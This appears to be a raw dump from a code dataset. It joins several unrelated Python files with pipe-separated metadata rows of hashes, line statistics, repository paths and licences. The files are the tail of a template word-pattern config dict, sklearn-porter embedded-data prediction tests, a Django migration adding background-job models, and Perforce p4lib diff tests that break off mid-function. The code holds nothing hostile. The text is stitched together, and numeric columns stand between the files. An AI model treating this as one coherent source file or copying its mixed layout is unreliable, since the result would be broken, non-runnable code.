"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
}
},
"classification": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'},
{"word": '_feature_engineering', "word_format": 'str.lower', 'word_type': 'append-left'},
{"word": 'from assets.', "word_format": 'str.lower', 'word_type': 'append-right'},
{"word": 'FeatureEngineering', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'},
{"word": '_visualizations', "word_format": 'str.lower', 'word_type': 'append-left'},
{"word": 'from assets.', "word_format": 'str.lower', 'word_type': 'append-right'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*\n*\s*:\s*\n*\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_feature_engineering_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*\n*\s*:\s*\n*\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_reuse_features_and_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*\n*\s*:\s*\n*\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_feature_engineering.py': {
"words": [{"word": 'FeatureEngineering', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_visualizations.py': {
"words": []
}
},
"crash_course": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.json': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.json': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
}
},
"basic_regression": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_custom_pipeline_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_feature_engineering_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_train_step_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_reuse_features_and_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
}
},
"spark_classification": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'},
{"word": '_feature_engineering', "word_format": 'str.lower', 'word_type': 'append-left'},
{"word": 'from assets.', "word_format": 'str.lower', 'word_type': 'append-right'},
{"word": 'FeatureEngineering', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_feature_engineering.py': {
"words": [{"word": 'FeatureEngineering', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
}
},
"spark_regression": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
},
"advanced_regression": {
'_data_manager.py': {
"words": [{"word": 'DataManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_model_manager.py': {
"words": [{"word": 'ModelManager', "word_format": 'str_capitalize', 'word_type': 'append-left'}]
},
'_train_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
},
'_forecast_config.py': {
'inner_path': 'configs',
"words": [{"word": '"asset_name": "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*"'},
{"word": '"asset_name": \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '"asset_name"\s*:\s*\''},
{"word": '\'asset_name\': \'', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*\''},
{"word": '\'asset_name\': "', "word_format": 'str.lower', 'word_type': 'append-right',
"word_pattern": '\'asset_name\'\s*:\s*"'},
{"word": '_config ', "word_format": 'str.lower', 'word_type': 'append-left'}]
}
}
}
| 66.416393
| 114
| 0.469221
| 1,957
| 20,257
| 4.544711
| 0.029637
| 0.149764
| 0.172476
| 0.202384
| 0.983472
| 0.981785
| 0.981785
| 0.981785
| 0.981785
| 0.981336
| 0
| 0
| 0.297477
| 20,257
| 304
| 115
| 66.634868
| 0.624974
| 0.003357
| 0
| 0.79538
| 0
| 0
| 0.455343
| 0.016843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dbc06fda4e8ec6de8f5b6814f726ad3044a4855c
| 3,068
|
py
|
Python
|
tests/estimator/classifier/EmbeddedData.py
|
mathewdgardner/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | 1
|
2022-02-15T12:44:37.000Z
|
2022-02-15T12:44:37.000Z
|
tests/estimator/classifier/EmbeddedData.py
|
Stardustsky/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | null | null | null |
tests/estimator/classifier/EmbeddedData.py
|
Stardustsky/sklearn-porter
|
d8927a6af06e96dd416be759321e93691c39cf73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
class EmbeddedData():
def test_random_features__binary_data__embedded(self):
self.load_binary_data()
self._port_estimator(embed_data=True)
amin = np.amin(self.X, axis=0)
amax = np.amax(self.X, axis=0)
shape = (self.N_RANDOM_FEATURE_SETS, self.n_features)
X = np.random.uniform(low=amin, high=amax, size=shape)
Y_py = self.estimator.predict(X).tolist()
Y = [self.pred_in_custom(x) for x in X]
self._clear_estimator()
self.assertListEqual(Y, Y_py)
def test_random_features__iris_data__embedded(self):
self.load_iris_data()
self._port_estimator(embed_data=True)
amin = np.amin(self.X, axis=0)
amax = np.amax(self.X, axis=0)
shape = (self.N_RANDOM_FEATURE_SETS, self.n_features)
X = np.random.uniform(low=amin, high=amax, size=shape)
Y_py = self.estimator.predict(X).tolist()
Y = [self.pred_in_custom(x) for x in X]
self._clear_estimator()
self.assertListEqual(Y, Y_py)
def test_random_features__digits_data__embedded(self):
self.load_digits_data()
self._port_estimator(embed_data=True)
amin = np.amin(self.X, axis=0)
amax = np.amax(self.X, axis=0)
shape = (self.N_RANDOM_FEATURE_SETS, self.n_features)
X = np.random.uniform(low=amin, high=amax, size=shape)
Y_py = self.estimator.predict(X).tolist()
Y = [self.pred_in_custom(x) for x in X]
self._clear_estimator()
self.assertListEqual(Y, Y_py)
def test_existing_features__binary_data__embedded(self):
self.load_binary_data()
self._port_estimator(embed_data=True)
preds, ground_truth = [], []
n = min(self.N_EXISTING_FEATURE_SETS, len(self.X))
for x in self.X[:n]:
preds.append(self.pred_in_custom(x))
ground_truth.append(self.pred_in_py(x))
self._clear_estimator()
# noinspection PyUnresolvedReferences
self.assertListEqual(preds, ground_truth)
def test_existing_features__iris_data__embedded(self):
self.load_iris_data()
self._port_estimator(embed_data=True)
preds, ground_truth = [], []
n = min(self.N_EXISTING_FEATURE_SETS, len(self.X))
for x in self.X[:n]:
preds.append(self.pred_in_custom(x))
ground_truth.append(self.pred_in_py(x))
self._clear_estimator()
# noinspection PyUnresolvedReferences
self.assertListEqual(preds, ground_truth)
def test_existing_features__digits_data__embedded(self):
self.load_digits_data()
self._port_estimator(embed_data=True)
preds, ground_truth = [], []
n = min(self.N_EXISTING_FEATURE_SETS, len(self.X))
for x in self.X[:n]:
preds.append(self.pred_in_custom(x))
ground_truth.append(self.pred_in_py(x))
self._clear_estimator()
# noinspection PyUnresolvedReferences
self.assertListEqual(preds, ground_truth)
| 39.333333
| 62
| 0.651565
| 423
| 3,068
| 4.399527
| 0.132388
| 0.032241
| 0.048361
| 0.064481
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0.966147
| 0
| 0.002986
| 0.235984
| 3,068
| 78
| 63
| 39.333333
| 0.790956
| 0.042047
| 0
| 0.876923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.092308
| false
| 0
| 0.015385
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91953a2991b05a6f97af82f07bc8f7f258b195e3
| 5,344
|
py
|
Python
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 14
|
2019-09-30T12:44:17.000Z
|
2022-02-04T14:45:16.000Z
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 244
|
2021-03-26T15:13:15.000Z
|
2022-03-31T15:48:04.000Z
|
variants/migrations/0073_clearexpiredexportedfilesbgjob_clearinactivevariantsetsbgjob_clearoldkioskcasesbgjob_refreshsmallvar.py
|
brand-fabian/varfish-server
|
6a084d891d676ff29355e72a29d4f7b207220283
|
[
"MIT"
] | 8
|
2020-05-19T21:55:13.000Z
|
2022-03-31T07:02:58.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-05-26 17:28
from __future__ import unicode_literals
import bgjobs.models
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
("bgjobs", "0006_auto_20200526_1657"),
("variants", "0072_deletecasebgjob"),
]
operations = [
migrations.CreateModel(
name="ClearExpiredExportedFilesBgJob",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"date_created",
models.DateTimeField(auto_now_add=True, help_text="DateTime of creation"),
),
(
"sodar_uuid",
models.UUIDField(default=uuid.uuid4, help_text="Case SODAR UUID", unique=True),
),
(
"bg_job",
models.ForeignKey(
help_text="Background job for state etc.",
on_delete=django.db.models.deletion.CASCADE,
related_name="variants_clearexpiredexportedfilesbgjob_related",
to="bgjobs.BackgroundJob",
),
),
],
options={"ordering": ("-date_created",), "abstract": False,},
bases=(bgjobs.models.JobModelMessageMixin, models.Model),
),
migrations.CreateModel(
name="ClearInactiveVariantSetsBgJob",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"date_created",
models.DateTimeField(auto_now_add=True, help_text="DateTime of creation"),
),
(
"sodar_uuid",
models.UUIDField(default=uuid.uuid4, help_text="Case SODAR UUID", unique=True),
),
(
"bg_job",
models.ForeignKey(
help_text="Background job for state etc.",
on_delete=django.db.models.deletion.CASCADE,
related_name="variants_clearinactivevariantsetsbgjob_related",
to="bgjobs.BackgroundJob",
),
),
],
options={"ordering": ("-date_created",), "abstract": False,},
bases=(bgjobs.models.JobModelMessageMixin, models.Model),
),
migrations.CreateModel(
name="ClearOldKioskCasesBgJob",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"date_created",
models.DateTimeField(auto_now_add=True, help_text="DateTime of creation"),
),
(
"sodar_uuid",
models.UUIDField(default=uuid.uuid4, help_text="Case SODAR UUID", unique=True),
),
(
"bg_job",
models.ForeignKey(
help_text="Background job for state etc.",
on_delete=django.db.models.deletion.CASCADE,
related_name="variants_clearoldkioskcasesbgjob_related",
to="bgjobs.BackgroundJob",
),
),
],
options={"ordering": ("-date_created",), "abstract": False,},
bases=(bgjobs.models.JobModelMessageMixin, models.Model),
),
migrations.CreateModel(
name="RefreshSmallVariantSummaryBgJob",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
(
"date_created",
models.DateTimeField(auto_now_add=True, help_text="DateTime of creation"),
),
(
"sodar_uuid",
models.UUIDField(default=uuid.uuid4, help_text="Case SODAR UUID", unique=True),
),
(
"bg_job",
models.ForeignKey(
help_text="Background job for state etc.",
on_delete=django.db.models.deletion.CASCADE,
related_name="variants_refreshsmallvariantsummarybgjob_related",
to="bgjobs.BackgroundJob",
),
),
],
options={"ordering": ("-date_created",), "abstract": False,},
bases=(bgjobs.models.JobModelMessageMixin, models.Model),
),
]
| 38.171429
| 99
| 0.458458
| 386
| 5,344
| 6.158031
| 0.222798
| 0.040387
| 0.029449
| 0.046277
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0.778713
| 0
| 0.014108
| 0.442927
| 5,344
| 139
| 100
| 38.446043
| 0.784347
| 0.012912
| 0
| 0.727273
| 1
| 0
| 0.176593
| 0.060129
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037879
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91b97fe149745dd2213b13cc90d98fdee631f290
| 12,086
|
py
|
Python
|
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
test/test_p4lib_diff.py
|
Tech-pandit/python-p4lib
|
6b5602321c3c79151a1e603c4ef7eac4a405fb68
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2002-2005 ActiveState Corp.
# See LICENSE.txt for license details.
# Author:
# Trent Mick (TrentM@ActiveState.com)
# Home:
# http://trentm.com/projects/px/
"""Test p4lib.py's interface to 'p4 diff'."""
import os
import sys
import types
import unittest
import pprint
import testsupport
from p4lib import P4, P4LibError
class DiffTestCase(unittest.TestCase):
def test_diff_formats(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_formats.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_formats')
# Open it and make an edit to be able to diff.
p4.edit(fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fname)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failUnless(result['text'].find('> another line') != -1)
result = p4.diff(fname, diffFormat='')[0]
self.failUnless(result['text'].find('> another line') != -1)
result = p4.diff(fname, diffFormat='n')[0]
self.failUnless(result['text'].find('a10 1') != -1)
self.failUnless(result['text'].find('another line') != -1)
result = p4.diff(fname, diffFormat='c')[0]
self.failUnless(result['text'].find('*'*15) != -1)
self.failUnless(result['text'].find('+ another line') != -1)
result = p4.diff(fname, diffFormat='s')[0]
self.failUnless(result['text'].find('add 1 chunks 1 lines') != -1)
result = p4.diff(fname, diffFormat='u')[0]
self.failUnless(result['text'].find('+another line') != -1)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_no_changes(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_no_changes.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_no_changes')
# Open it and make NO edits.
p4.edit(fname)
results = p4.diff(fname)
result = results[0]
self.failUnless(os.path.basename(result['depotFile']) == fname)
self.failUnless(os.path.basename(result['localFile']) == fname)
self.failUnless(result.has_key('rev'))
self.failIf(result.has_key('text'))
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_satisfying_a(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_a.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_a')
# Open it and make NO edits.
p4.edit(fname)
results = p4.diff(fname, satisfying='a')
self.failIf(results)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname, satisfying='a')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_satisfying_d(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_d.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_d')
results = p4.diff(fname, satisfying='d')
self.failIf(results)
os.chmod(fname, 0777)
os.remove(fname)
result = p4.diff(fname, satisfying='d')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
finally:
os.chdir(top)
def test_diff_satisfying_e(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_e.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_e')
results = p4.diff(fname, satisfying='e')
self.failIf(results)
# Make an edit but do NOT open it for edit.
os.chmod(fname, 0777)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
result = p4.diff(fname, satisfying='e')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
finally:
os.chdir(top)
def test_diff_satisfying_r(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_satisfying_r.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_satisfying_r')
results = p4.diff(fname, satisfying='r')
self.failIf(results)
# Open it and make NO edits.
p4.edit(fname)
result = p4.diff(fname, satisfying='r')[0]
self.failUnless(os.path.basename(result['localFile']) == fname)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
results = p4.diff(fname, satisfying='r')
self.failIf(results)
# cleanup
p4.revert(fname)
finally:
os.chdir(top)
def test_diff_force(self):
top = os.getcwd()
andrew = testsupport.users['andrew']
p4 = P4()
try:
os.chdir(andrew['home'])
# Submit a first revision of a test file.
fname = 'test_diff_force.txt'
fout = open(fname, 'w')
for i in range(10): fout.write("line %d\n" % i)
fout.close()
p4.add(fname)
p4.submit(fname, 'for test_diff_force')
# Make an edit but do NOT open it for edit.
os.chmod(fname, 0777)
fout = open(fname, 'a')
fout.write("another line\n")
fout.close()
